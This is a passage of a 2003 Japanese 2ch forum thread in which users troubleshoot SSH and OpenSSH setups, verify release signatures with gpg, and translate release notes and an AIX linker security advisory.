ルータのWebインタフェースも利用できればいいのですが
内側からしかアクセスできないのです。

677 :名無しさん@お腹いっぱい。:03/03/13 10:25
publickey 認証のみ許可すればいいだけでわ?

678 :名無しさん@お腹いっぱい。:03/03/13 14:22
んだな。それに passwd 認証にしても、
ホスト鍵の指紋をつねに紙に書いて覚えておけばいいだけ。

679 :山崎渉:03/03/13 16:27
(^^)

680 :672の母の息子でです:03/03/13 19:35
翻訳してくれてさんきゅ♪さすがかあちゃん。

>675
それだと

681 :672の母の息子でです:03/03/13 19:38
間違い。
>675
かあちゃんのゆーとおりレンタルサーバなのでルータは制御できません。

>678
それってどういうこと?

682 :うひひ:03/03/13 20:01
>>681
自宅のIPをDDNSに喰わしてその名前を使ったらドーなの?


683 :名無しさん@お腹いっぱい。:03/03/13 22:14
門前払いしなければいけない理由はなんだ?

sshdのセキュリティホールが心配。とか?

684 :675:03/03/13 22:15
>>676
| ルータのWebインタフェースも利用できればいいのですが
| 内側からしかアクセスできないのです。

webインタフェイスにアクセスするのはルータの内側のマシン上にある
スクリプトで、そいつがサーバにメールを送るのでいいんでは?
PPTPとかIPSEC(racoon, isakmpd)とかを併用するのではだめなんですか?

685 :672の母:03/03/14 14:31
>>683
あ、ごめんよ。母は別に sshd だけじゃないのよ。息子はどうか知らんけど。
つーわけで ssh の話じゃないので吊ってくるわ。お先に!>息子

686 :名無しさん@お腹いっぱい。:03/03/15 09:11
(´-`).。oO(そのうち「>>672の精子です」とかいうやつも出てくんじゃないかな)

687 :名無しさん@お腹いっぱい。:03/03/16 17:59
sftpって転送モードの指定ができないんだけど
実際は何モードで転送されてるの?
バイナリモード?

688 :名無しさん@お腹いっぱい。:03/03/16 18:35
sftp という名前がついているが、実際は scp のラッパーみたいなもの。

689 :名無しさん@お腹いっぱい。:03/03/17 20:08
openSSHをインストールしようと思っているのですが、
スタンドアロン+TCP Wrappersがいいのか、xinetdから起動か、
どっちがいいのでしょうか?

690 :名無しさん@お腹いっぱい。:03/03/17 22:45
> sftp という名前がついているが、実際は scp のラッパーみたいなもの。

ssh のラッパーだよ。

691 :名無しさん@お腹いっぱい。:03/03/17 23:15
>689
tcpserver から起動

>690
> ssh のラッパーだよ。
ssh のモジュールだよ。

692 :名無しさん@お腹いっぱい。:03/03/17 23:32
>>689
前者

693 :名無しさん@お腹いっぱい。:03/03/18 12:08
>>634 keychain と .ファイル
てか、keychain 使っている人いない?


694 :名無しさん@お腹いっぱい。:03/03/18 12:30
>>693
使ってますが、何か?


695 :693:03/03/18 13:35
>694
ごめん。このスレにでてなかったんで... 前のスレで語り尽くされていたのね。
激しく便利。


696 :名無しさん@お腹いっぱい。:03/03/18 23:04
利便性は安全性の犠牲の上に成り立っている

697 :名無しさん@お腹いっぱい。:03/03/18 23:19
ところでSSH Secure Shellのssh-keygenに
-pってオプションがあってパスフレーズを引数で入力できるんですが
これって他人にps axとかされると危険じゃないんでしょうか?

ssh-keygenを使うのは最初だけだから多分大丈夫ってことなんですかね?


698 :名無しさん@お腹いっぱい。:03/03/18 23:50
>>697
漏れ、ちょうど今こんなスクリプト書いてたところだったよ。

system("ssh-keygen -t #{type} -N '' -f #{file}")

パスフレーズが空だから良いけど、ちゃんとした文字列入れるのはコワイね。

699 :名無しさん@お腹いっぱい。:03/03/19 00:42
>697
利便性は安全性の犠牲の上に成り立っている

どうでもよいが、
> SSH Secure Shell
を見て、頭痛が痛くなった

700 :名無しさん@お腹いっぱい。:03/03/19 00:55
Terminal Emulator <Guevara>
http://www.routrek.co.jp/product/guevara.html


701 :初期不良:03/03/19 01:36
>>700
イイかも
使ってみまつ

702 :名無しさん@お腹いっぱい。:03/03/19 02:16
>>699
SSH Secure Shell for Workstations
http://www.ssh.com/products/security/secureshellwks/


703 :名無しさん@お腹いっぱい。:03/03/19 09:32
>>700
ためしにダウソしてみました。
感想
 起動が重いうえに、Port Forwardingはできないようだ。 これは致命的。
トンネルが掘れないと、会社でコソーリ ネットができないじゃないか(藁

704 :bloom:03/03/19 10:09
http://www.agemasukudasai.com/bloom/

705 :名無しさん@XEmacs:03/03/19 17:00
>>659
> マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
> を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
> 今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

なんか普通にできるんだが。

augustus[259]$ ssh -f caesar "nohup ssh caligula sleep 30 &"
augustus[260]$ ssh caligula ps x | egrep sleep
25475 ?? Is 0:00.01 sleep 30
augustus[261]$

環境の違い?

706 :名無しさん@XEmacs:03/03/19 17:14
>>660
> host-A:25----host-B:25----host-C:25
> というふうに2重にssh-portfowardingして実質的に
> host-A:25----host-C:25
> にするにはどのようにすればいいのでしょう?

Portforwarder は持ってないので OpenSSH でしか試してないけど

> host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
> command="ssh host-C"とか書いて、

という方向性でうまく行くよん (もちろん、port forwarding option
の記述が double quotation の中になきゃダメだけど)。

あらかじめ host-B→Host-C の port forwarding を設立しとく方が簡
単だとは思うけど。

> host-A(windows)のPortforwarderで
> チャレンジしましたけどhost-Cまでたどり着けませんでした。

具体的にどうチャレンジしたん?ほんとに上の通りの設定だとしたら、
host-B のユーザが root じゃなきゃ port を開けないわけだが。


707 :へのへのもへじ:03/03/20 21:00
CHROOTされた環境でのWINSCPの使用について教えてください。
http://mail.incredimail.com/howto/openssh/
↑このページを参考にしてOpenssh3.5を入れてみたんですけど、
winscpがうまく使えませんでした。chrootして接続できるの
ですが、実際にファイルのコピーができないのです。
OSはRedHat7.2,7.3両方で試したのですが、、、。
何か方法ご存知の方いらっしゃいますか?

708 :名無しさん@お腹いっぱい。:03/03/22 22:36
不安定な回線から使ってて、回線が切れてもセッション維持する事って出来ませんか

709 :名無しさん@お腹いっぱい。:03/03/22 22:50
>>708 screen

710 :名無しさん@お腹いっぱい。:03/03/22 22:54
>>709
調べてみます。
どもありがと

711 :参考までに:03/03/23 16:45
>>708>>710
GNU screen その2
http://pc.2ch.net/test/read.cgi/unix/1048030339/l50
の1にあるリンク先とか

# というか、全然SSHとか関係ない罠(w

712 :名無しさん@XEmacs:03/03/23 17:40
>>707
> 何か方法ご存知の方いらっしゃいますか?

とりあえず、WinSCP が吐く log 見てみれば、何か分かるのでは?


713 :春山征吾 ◆ok9Ggg6xsM :03/03/24 00:27
>>707
私はWINSCPを利用したことがないのですが
http://www.sdri.co.jp/rssh/faq.html.ja
に依ればWINSCPは
「コマンドラインの ssh ツールに GUI フロントエンドを提供する小さなハック」
で、
「ユーザが ssh を通してファイルシステムを操作するためのコマンドを実行できることが必要である」
ということです.

714 :名無しさん@お腹いっぱい。:03/03/27 12:06
厨質問でごめん。
sshで接続しているサーバのsslとsshをアップデートする場合
sshdをkillすることになるので作業できなくならない?

715 :名無しさん@お腹いっぱい。:03/03/27 12:16
>>714
SSH ログインした状態で ps -ef | grep sshd してみ。
子プロセスの方を残しておけばセッションは切られない。はず。
もちろん失敗するとログインできなくなるので
local でやった方が無難ではある。

716 :名無しさん@お腹いっぱい。:03/03/27 12:49
> local でやった方が無難
レンタルサーバの人はどーすれば?(w

717 :うひひ:03/03/27 13:01
>>716
>>715の「はず」に期待するかtelnetでも開けておけばいいでしょ


718 :名無しさん@お腹いっぱい。:03/03/27 13:36
httptunnel+sshで接続したDebianサーバ上で /etc/init.d/ssh restart を
実行しても切れなかった。

719 :名無しさん@お腹いっぱい。:03/03/27 13:43
>>716
知らねーよ。
リスクを理解した上でそういう環境使ってるなら
どうすればいいかは自分で考えるべきだろ。

720 :名無しさん@お腹いっぱい。:03/03/27 14:08
>>714
kill することになるのですか本当ですか?

721 :名無しさん@お腹いっぱい。:03/03/27 14:50
漏れはそれが嫌なのでinetdからsshdを上げるようにしている。
最近のCPUは速いから遅くもなんとも感じねー

722 :名無しさん@お腹いっぱい。:03/03/27 21:11
>716
ポートずらす

723 :名無しさん@お腹いっぱい。:03/03/28 01:32
>>716
前のバージョンを残しておけばいいんじゃないの?

724 :名無しさん@お腹いっぱい。:03/03/28 04:05
>>723
sshd 落ちた状態で不意に SSH セッション切れちゃったら、
そっから先は一体どうすりゃええねん、っつー話でしょ。

725 :名無しさん@お腹いっぱい。:03/03/28 04:21
だからkillする前に前のバージョンを別のポートで動かしとけばいいんじゃないのかな

726 :名無しさん@お腹いっぱい。:03/03/28 05:22
daemontools から上がるようにしとけば不意に sshd 落ちちゃっても復活する?

727 :名無しさん@お腹いっぱい。:03/03/28 10:32
libcrypto.so の変更にコケたら daemontools を使おうが inetd だろうがコケる。
libcrypto.a なら関係ないけど。


728 :名無しさん@お腹いっぱい。:03/03/28 11:16
オペミスの可能性もあるし。

729 :名無しさん@お腹いっぱい。:03/03/28 12:22
>>727
んじゃ、万が一のために static link した sshd のバイナリを作っといて、
作業中には inetd か何かで別ポートで上げとく、これでどうよ?
# って、そんな引っ張るネタでもねえな、そろそろやめときまつ。

730 :春山征吾 ◆ok9Ggg6xsM :03/03/31 23:05
OpenSSH 3.6, 3.6p1 がリリースされました。
変更点の拙訳を
http://www.unixuser.org/%7Eharuyama/security/openssh/henkouten_3.6.txt
に置きました.

731 :名無しさん@お腹いっぱい。:03/03/31 23:08
えっ! まだ出とらんぞ。

732 :名無しさん@お腹いっぱい。:03/03/31 23:24
>>731
出てるけどミラーが行き渡ってないだけでしょ。

733 :名無しさん@お腹いっぱい。:03/04/01 01:32
>>731
出てるYO! アナウンスメール:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-March/000058.html

>春山san
早いっすね!いつもどうもです m(__)m
ちなみに、前スレはhtml化されてます:
  ssh
  http://pc.2ch.net/unix/kako/976/976497035.html

734 :731:03/04/01 03:41
本当だ。
どうも

735 :名無しさん:03/04/01 04:14
scpに-1が渡せるのうれしいな。いままで-oProtocol=1してたから。


736 :新山:03/04/01 10:16
マニュアル翻訳しますた。
間違いがありましたらご指摘いただければ幸いです。
http://www.unixuser.org/%7Eeuske/doc/openssh/jman/index.html

マニュアルを翻訳していて気づいた変更点は、

1. scp: -1, -2, -l (帯域制限) オプション追加
2. sftp: コマンドの前に "-" をつけるとエラーが発生しても終了しない。
3. ssh-add: -c オプション追加 (鍵を使用するときにユーザに確認をとる)
4. ssh-agent: -t (鍵のデフォルト生存時間) オプション追加。でも ssh-add で指定した値のほうが優先される。
5. ssh-keysign を使うには ssh_config で、HostbasedAuthentication のほかに EnableSSHKeysign = yes とする必要がある。

といったところですかね。


737 :名無しさん@Emacs:03/04/01 15:04
>>732
ftp.ayamura.org/pub/openssh がミラー頻度が多い


738 :名無しさん@お腹いっぱい。:03/04/01 23:21
頻度は「高い」


739 :新山:03/04/02 11:01
3.6.1 になったようれす。

なにやら 3.6 に入れたバグフィックスが別のバグになってしまい、
他の SSH と通信が途切れるようになったため、これを防止したとのことです。

CVS Log:
The 'kex guesses' bugfix from OpenSSH 3.6 triggers a bug
in a few other SSH v2 implementations and causes connections to
stall. OpenSSH 3.6.1 disables this bugfix when interoperating
with these implementations.


740 :名無しさん@お腹いっぱい。:03/04/03 22:32
>>738
「大きい」だろ

741 :名無しさん@お腹いっぱい。:03/04/04 04:09
>>740
738じゃないが、一応
http://dictionary.goo.ne.jp/search.php?MT=%C9%D1%C5%D9&kind=&mode=0&jn.x=17&jn.y=11

742 :名無しさん@お腹いっぱい。:03/04/09 17:47
OpenSSHを手に入れて,署名も手に入れたんですけど,
肝心の公開鍵がどこにあるのかわかりません。
探し回ったけど見つからないです。
トロイの事件があったので気にしているんですけど,鍵がどこにあるか
教えてくれませんか?


743 :名無しさん@お腹いっぱい。:03/04/09 18:41
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/DJM-GPG-KEY.asc

744 :名無しさん@お腹いっぱい。:03/04/09 20:21
>742
鍵じゃなくて署名だろ
鍵だったら鍵サーバにあるでそ

745 :名無しさん@お腹いっぱい。:03/04/09 20:42
本体が落とせて署名が見つからないってあるかな
鍵サーバで探すとしてなにでサーチするんだろ

746 :名無しさん@お腹いっぱい。:03/04/09 22:12
鍵サーバからはメールアドレスで検索できる
ただし、その鍵が信用できるものかどうかの検証、という問題が残るが

747 :名無しさん@お腹いっぱい。:03/04/09 22:19
メールアドレスってだれのメールアドレス?

748 :初期不良:03/04/10 11:59
>>745
署名を確認しようとすると鍵 ID が表示されて
この ID の公開鍵が見つからないと言われたりする。
キーサーバを設定してあれば見つからない公開鍵は
自動的に取得してくれたりもする。
あとはこちらで

PGP / gpg スレ
http://pc.2ch.net/test/read.cgi/unix/1007324740/


749 :742:03/04/10 16:35
>>743 ありがとうございました

とりあえず検証完了しました。

厳密には,743さんの教えてくれた鍵が正しいかどうか検証が必要ですが,
今回はbsdのサイトにおいてあったし,
opensshのサイトにおいてあった署名が無事検証できたので
とりあえずOKとしました。

このままだと,ただの教えて君なので,検証したメモを残しておきます。
今更かもしれないけれど,周りにgpg使っていない人も多いので多少は
意味があると思って書いておきます。



750 :742:03/04/10 16:35
gpgのインストール
さすがにこれは省略

自分用の私有鍵と公開鍵の作成
$ gpg --gen-key

基本的にデフォルトの設定で進む

パスフレーズなどを入力すると,~/.gnupg/ 以下に鍵などができる

$ gpg --list-keys
で確認

鍵のインポート
$ gpg --import DJM-GPG-KEY.asc
教えていただいた鍵を登録

$ gpg --list-keys
で確認

登録した鍵を,信用するために,自分の鍵で署名
$ gpg --lsign-key djm@mindrot.org

どれくらい信用するか聞かれるが,適当に答える。デフォルトでもよし。
本当はきちんと検証する必要がある。

ようやく,署名の検証が可能
$ gpg --verify openssh-3.6.1p1.tar.gz.sig

問題なければ終了。


751 :714:03/04/11 12:55
sshdをkillしてssl,sshともにアップデートしましたがセッション切れずに
できました。
text file busyとかにもならないんだなぁ…もっと勉強しよう

752 :名無しさん@お腹いっぱい。:03/04/11 20:49
>751
> text file busyとかにもならないんだなぁ

OS によってはなる

753 :名無しさん@お腹いっぱい。:03/04/11 21:55
リモートにファイルを転送してそれを実行みたいなことをやりたいんだけど、
認証を一回で済まして、スクリプトで実行するには
どんな方法がありますか?

ssh-agentでパス打ち込むの一回だけとかって意味じゃなくて、
本当に認証を一回ですませたいんだけれど。
scpとかsftpで一度認証してるのに
sshで入りなおしてもう一度認証っていうのがアレなので。

754 :名無しさん@お腹いっぱい。:03/04/11 23:29
>753
uuencode したものを流しこんで uudecode して実行するとか

755 :名無しさん@お腹いっぱい。:03/04/11 23:42
ssh remote cat ">" script.tmp ";" sh script.tmp ";" rm script.tmp < my-script

756 :名無しさん@お腹いっぱい。:03/04/12 00:02
>753
cat スクリプト | ssh REMOTE sh
とかじゃダメ?

バイナリファイルが実行したい場合は、754のように、
uuencodeした物をヒアドキュメントで埋め込んだスクリプトを作るとか。






757 :753:03/04/13 00:26
>>754>>755>>756
なるほど、いろいろやり方があるんだなぁ。
いろいろ試してみようと思います。どうもありがとうございましたー

758 :山崎渉:03/04/17 11:56
(^^)

759 :名無しさん@お腹いっぱい。:03/04/17 22:34
すみません。教えてください。
ssh HOST "command"
とやるとき、シェル(デフォルトシェル?)を介して
コマンドを実行するんでしょうか、
それともシェルを介さずにコマンドが実行されるんでしょうか?

760 :名無しさん@お腹いっぱい。:03/04/17 23:59
sshでログインできません。
自分の家の中のLAN内では問題なくできるのですが、
知人の家のマシンからログインさせたいのですが、できないのです。
とりあえずiptablesとかTCPラッパーは無効にしてます。
ルーターのバーチャルコンピュータの設定で転送先IPアドレスを
そのsshdが入ってるホストにしてます。クライアントはwinでputtyで鍵を生成しました。
その鍵をつかってLAN内からはアクセスできてます。しかし、友人の家からアクセスして
もらうとできないんです。could not load private key fileとかでるんです。
誰かアドバイスお願いします

761 :名無しさん@お腹いっぱい。:03/04/18 00:57
>>759
ssh HOST ps auxw とかすれば分かるでしょ。
ps のオプションは違うかもしれんが。。。

762 :名無しさん@お腹いっぱい。:03/04/18 08:53
putty って、鍵だけを別のマシンにもっていっても使えなかった
気がする。
友人のマシンで鍵を生成して、公開鍵をサーバ側に持っていったら
どうなる?

あ、その前に、公開鍵認証でなく、login pass でアクセスできるか
確認しておいた方がよいかも。

763 :名無しさん@お腹いっぱい。:03/04/18 14:09
>>761
微妙だな。

sshd を ktrace とか strace 付きで動かしておいて出力を検分とかのほうが
確実か…

764 :759:03/04/18 16:12
>>761>>763
わかりました。どうもありがとうございました。

765 :名無しさん@お腹いっぱい。:03/04/18 21:11
>760
「友人の家」でも PuTTY を使っているのか?

違う実装、例えば OpenSSH とは鍵の互換性は無いよ。
変換は可能だが。

766 :760:03/04/19 00:50
>>765 >>762
返事ありがとう。
とりあえず、puttygenだけ相手に渡して、向こうで鍵をつくってもらいました。
それで公開鍵をサーバーに置いたけど、アクセスできない・・・
友人がつくった鍵をもらって、自分の家のLAN内からアクセスするとやっぱり
接続できる。次にPasswordAuthentication yesに設定してパスワードで
ログインさせようとするもできませんでした。以下がエラーメッセージです。

login as: hogehoge
Sent username "hogehoge"
Trying public key authentication.
No passphrase required.
Couldn't load private key from C:\putty\id_rsa_hoge.

パスワード認証しようとすると

hogehoge@xxx.yyy.aaa.aa's password:
Access denied

となるのです。


767 :名無しさん@お腹いっぱい。:03/04/19 01:08
>766
アドレスでアクセス制限でもしてるんじゃないの?

768 :760:03/04/19 01:12
>>767
それはsshd.configの中でできるのですか?
特にそういうことはしてないのですが。
ほかにどういう可能性がかんがえられるのでしょう?
ちなみにtelnet,ftp,等は接続できてますので、
やはりsshの問題と考えているのですが

769 :名無しさん@お腹いっぱい。:03/04/19 01:28
>>768
デバッグモードで問題の絞り込みぐらい城

くれぐれも、デバッグモードってどうやるの、とか聞くなよ

770 :760:03/04/19 01:37
>>769
う・・・
わからないです。
調べます

771 :名無しさん@お腹いっぱい。:03/04/19 08:39
>>770(=>>760
とりあえず、
   http://www.unixuser.org/~euske/doc/openssh/jman/
嫁!sshd(8)の -d オプションがそれ。「またサーバは fork せず、1回の接続しか
受けつけません。」ということなんで注意!
   [server]# sshd -ddd

772 :山崎渉:03/04/20 05:51
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

773 :名無しさん@お腹いっぱい。:03/04/22 13:55
#KerberosAuthentication no
#PermitUserEnvironment no

sshd_config(5)によればどちらも「デフォルトは``no''」と書いてあるのに
コメント外したらsshdが起動しないのはなぜ?

774 :名無しさん@XEmacs:03/04/22 15:06
>>773
> コメント外したらsshdが起動しないのはなぜ?

--with-kerberosX 辺りを付けて configure してないと、この option
項目の存在そのものがなかったものとして扱われるため。

> #PermitUserEnvironment no

だけなら起動するのでは?


775 :名無しさん@お腹いっぱい。:03/04/24 09:08
すいません。教えてくださいです。
環境は
redhat 8.0
ADSL-acca12M
です。
ハブを使って二台のパソコンを配線しています。

winXPパソコンからttsshを使ってLinuxのパソコンにログインしようとすると、
しばらして、「Cannot connect the host」とエラーが出るんです。
Linux側でSSHは起動しています。
初心者ですが、よろしくお願いします。

776 :名無しさん@お腹いっぱい。:03/04/24 09:10
>>775です。
ごめんなさい。ここUNIX版でした。
Linux版に移ります。

777 :名無しさん@お腹いっぱい。:03/04/24 09:27
>>776
かまわんと思うが。

778 :名無しさん@お腹いっぱい。:03/04/24 09:52
それだけじゃわからん。ssh -v した結果はってよ。

779 :名無しさん@お腹いっぱい。:03/04/24 19:27
>>775
hosts.allow にssh を許可するIP アドレスが無いんじゃないですかねえ

780 :名無しさん@お腹いっぱい。:03/04/24 19:29
あ、redhat 8.0 だったらxinetd の方かもしんないです。スレ汚しスマソ

781 :名無しさん@お腹いっぱい。:03/04/24 20:13
>>780
RedHatではsshdの起動にwrapperの類いは使ってないのであります。

たぶん/usr/sbin/lokkitでsshのポートを開けると繋がるんじゃないかなあ。
デフォではwell knownなポートは全部rejectするようになってたと思う。


782 :ありがとうございます!!:03/04/25 10:02
>>775です。
みなさんありがとうございます!!
lokkitでsshのポートを開けたらログインできました!
お騒がせしました!!(泣!!)

783 :名無しさん@お腹いっぱい。:03/04/27 01:23
会社のRedHat8に自宅のOpenBSDのsshd_config突っ込んだら動かなくなった。
しかもリモートから。明日会社に行ったら怒られるんだろうなぁ。

784 :初期不良:03/04/27 03:27
OpenBSD って事は portable かそうでないかって言う違い?
それとも RedHat8.0 標準が OpenSSH_3.4p1 だから?

785 :名無しさん@お腹いっぱい。:03/04/27 12:57
kerberos

786 :783:03/04/27 19:35
kerberos関連とUsePrivilegeSeparationとCompression削除で解決。
UsePrivilegeSeparation使えないと気持ち悪いが、まぁいいか。

787 :名無しさん@お腹いっぱい。:03/04/30 01:01
3.6.1p2 age

788 :名無しさん@お腹いっぱい。:03/04/30 21:43
3.6.1p2公開のアナウンスメール:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000060.html

aixgcc.adv:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000061.html


>>787
乙!

789 :名無しさん@お腹いっぱい。:03/04/30 21:55
「3.6.1p2公開のアナウンスメール」(URLは>>788参照)の日本語訳書いときます
(ただし"Changes since OpenSSH 3.6.1p1"の部分だけ)

3.6.1p1からの変更内容
============================

* SECURITY: AIX/gccでのリンク時の問題を修正。AIXユーザは直ちにアップグレー
 ドすることが推奨される。詳しくは別のアドバイザリ(aixgcc.adv)を参照のこと。
* Irixでのビルド時における問題を修正した。
* AFSサポート付きでビルドする際の問題を修正した。
* Openwall Linux から提供されたパッチのいくつかをマージした。

790 :名無しさん@お腹いっぱい。:03/04/30 22:44
ちなみに、アナウンスメールにあるMD5チェックサムは openssh-3.6.1p2.tar.gz の
もののようです。(ファイル名が間違っている)

791 :名無しさん@お腹いっぱい。:03/04/30 22:46
aixgcc.adv(URLは>>788参照)の日本語訳:

1. 影響を受けるシステム

  3.6.1p2よりも前の移植版OpenSSHをAIX上で使用しているユーザは、その
  OpenSSHがAIXのものでないコンパイラ(例えばgcc)でコンパイルされたもの
  である場合、この影響を受けます。

  ただし、IBMから提供されているOpenSSHのパッケージはこの影響は受けないこ
  とに注意して下さい。


792 :791:03/04/30 22:48
2. Description

  AIXのランタイムリンカは、デフォルトでは、ダイナミックライブラリを、シス
  テムで規定されているパスから探す前にカレントディレクトリから探そうとし
  ます。これは実行ファイルがset[ug]idされているかどうかにかかわらず行わ
  れます。

  この振る舞いは安全でないばかりでなく、極めて危険なことです。攻撃者は
  ライブラリをすげ替えることによってより高い権限をローカルで搾取すること
  ができてしまいます。

  移植版OpenSSHはこのふざけた仕様に対処するための部分をconfigureスクリ
  プトに含めていますが、それはあくまでAIX純正のコンパイラでのみ有効と
  なっています。デフォルトの危険なAIXの振る舞いを変えていない場合、gccは
  AIX純正のコンパイラとは異なるコマンドラインオプションを指定する必要が
  あります。

793 :791:03/04/30 23:07
3. 受ける影響

  ローカルユーザが不正に高い権限を搾取することができてしまいます。

4. 短期的な回避方法

  インストールされたバイナリからすべてのset[ug]idを取り除くことです。その
  バイナリは、たいていは 'ssh-agent' と 'ssh-keysign' ですが、古いバー
  ジョンでは 'ssh' も setuid されているかもしれません。

  ただし、ssh-keysignからsetuidを取り除くことでHostbased認証ができなく
  なることに注意して下さい。

  移植版OpenSSH 3.6.1p2 では、危険なリンカの振る舞いを避けるために、正し
  いオプションを使うようにしております。

794 :791:03/04/30 23:17
5. 解決策

  この問題を解決するためには、AIXのリンカが、デフォルトでシステムで規定
  されているパスのみから(ダイナミックライブラリを)探し、かつset[ug]idされ
  たバイナリに関してはカレントディレクトリやユーザが指定したディレクトリ
  を決して探さないように変更しなければならない。

  我々はこれを、IBMのリンカに含まれている深刻な欠陥であると考えており、
  IBM側にこれを直ちに修正するよう主張する。IBMのヤシども、聞いてるかぃ?

795 :791:03/04/30 23:19
6. Credits
は省略。

おしまい。
間違いとかあったら指摘よろしくです。


# >>793はコピペ荒らしなんで削除依頼出しときます。

796 :名無しさん@お腹いっぱい。:03/04/30 23:31
1.にある「IBMから提供されているOpenSSHのパッケージ」のURLは
   ttp://oss.software.ibm.com/developerworks/projects/opensshi
な。追記忘れとる。。

797 :名無しさん@お腹いっぱい。:03/04/30 23:31
>>795
># >>793はコピペ荒らしなんで削除依頼出しときます。
削除した為現在は存在しません。
出来れば荒らしにはレスを付けずにご依頼をお願いいたします。

798 :名無しさん@お腹いっぱい。:03/04/30 23:33
>>797
あれ、「あぼーん」だけになるんじゃないのか。。。

799 :名無しさん@お腹いっぱい。:03/05/01 00:44
>>798
申し訳ありません。通常削除するべきところを誤って透明削除してしまいました。


800 :名無しさん@お腹いっぱい。:03/05/05 09:50
ttp://triaez.kaisei.org/~kaoru/diary/?200305a#200305045
GlobalKnownHostsFile をこんなふうにつかってるヤシいるのか


801 :名無しさん@お腹いっぱい。:03/05/08 13:43
unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
うまくいきません。
クライアント側で ssh-keygen1 して、public key をサーバの ~/.ssh/authorized_keys に
はりつけるだけですよね?
ssh -v したところ、以下のようなエラーでした。


802 :名無しさん@お腹いっぱい。:03/05/08 13:45
********************************************************
debug: SshAppCommon/sshappcommon.c:133/ssh_app_get_global_regex_context: Allocating global SshRegex context.
debug: SshConfig/sshconfig.c:2232/ssh2_parse_config: Unable to open /home/yamamot9/.ssh2/ssh2_config
debug: Connecting to kuma, port 22... (SOCKS not used)
debug: Ssh2/ssh2.c:1977/main: Entering event loop.
debug: Ssh2Client/sshclient.c:1403/ssh_client_wrap: Creating transport protocol.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "hostbased" to usable methods.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "publickey" to usable methods.
debug: Ssh2Client/sshclient.c:1444/ssh_client_wrap: Creating userauth protocol.
debug: client supports 2 auth methods: 'hostbased,publickey'
debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
debug: Ssh2Common/sshcommon.c:562/ssh_common_wrap: remote ip = 192.168.4.128, remote port = 22
debug: SshConnection/sshconn.c:1930/ssh_conn_wrap: Wrapping...
debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug: Ssh2Transport/trcommon.c:1306/ssh_tr_input_version: Remote version has rekey incompatibility bug.
debug: Ssh2Transport/trcommon.c:1309/ssh_tr_input_version: Remote version is OpenSSH, KEX guesses disabled.
debug: Ssh2Transport/trcommon.c:1648/ssh_tr_negotiate: lang s to c: `', lang c to s: `'


803 :名無しさん@お腹いっぱい。:03/05/08 13:45
debug: Ssh2Transport/trcommon.c:1714/ssh_tr_negotiate: c_to_s: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Ssh2Transport/trcommon.c:1717/ssh_tr_negotiate: s_to_c: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Remote host key found from database.
debug: Ssh2Common/sshcommon.c:318/ssh_common_special: Received SSH_CROSS_STARTUP packet from connection protocol.
debug: Ssh2Common/sshcommon.c:368/ssh_common_special: Received SSH_CROSS_ALGORITHMS packet from connection protocol.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthPubKeyClient/authc-pubkey.c:1536/ssh_client_auth_pubkey_add_file_keys: adding keyfile "/home/yamamot9/.ssh2/id_dsa_1024_grandma" to candidates
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthClient/sshauthc.c:316/ssh_authc_completion_proc: Method 'publickey' disabled.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.
debug: Ssh2/ssh2.c:127/client_disconnect: locally_generated = TRUE
Disconnected; no more authentication methods available (No further authentication methods available.).
debug: Ssh2Client/sshclient.c:1478/ssh_client_destroy: Destroying client.
debug: SshConnection/sshconn.c:1982/ssh_conn_destroy: Destroying SshConn object.
debug: Ssh2Client/sshclient.c:1540/ssh_client_destroy_finalize: Destroying client completed.
debug: SshAuthMethodClient/sshauthmethodc.c:89/ssh_client_authentication_uninitialize: Destroying authentication method array.
debug: SshAppCommon/sshappcommon.c:146/ssh_app_free_global_regex_context: Freeing global SshRegex context.
**************************************************************


804 :名無しさん@お腹いっぱい。:03/05/08 13:46
debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.

のあたりだと思うので、調べてみたのですが、よくわかりません。
ちなみに ssh2 から openSSH2 では ssh ログインできているのですが、
必要ができて ssh から openSSH へとログインしたい状態です。

よろしくお願いします。


805 :名無しさん@お腹いっぱい。:03/05/08 20:52
大学、学科、名字までわかるログだな。

806 :動画直リン:03/05/08 21:14
http://homepage.mac.com/hitomi18/

807 :名無しさん@お腹いっぱい。:03/05/08 22:15
debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
(;´Д`)/lァ/lァ

808 :名無しさん@お腹いっぱい。:03/05/08 22:16
設定ファイルも晒した方がいいかもな

809 :名無しさん@お腹いっぱい。:03/05/08 22:31
>801
「unixクライアント SSH1」 とは ssh.com の ssh のことか?
OpenSSH の鍵とはフォーマットが違うが、変換はしたのか?

モロ出しハァハァ

810 :名無しさん@XEmacs:03/05/08 22:54
>>801
> unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
> うまくいきません。

そりゃ、そのでぶの Protocol が

>>802
> debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1

の通り version2 のみの設定になってるからだろう。SSH1 で繋げるた
めにはここが SSH-1.99-… となってなきゃあかん。

でぶの sshd_config の設定を見直せば治る。


811 :名無しさん@お腹いっぱい。:03/05/08 23:02
>>809
openssh は最初から ssh1 も ssh2 も両方話せますよ、一応。

812 :名無しさん@お腹いっぱい。:03/05/08 23:04
>>808
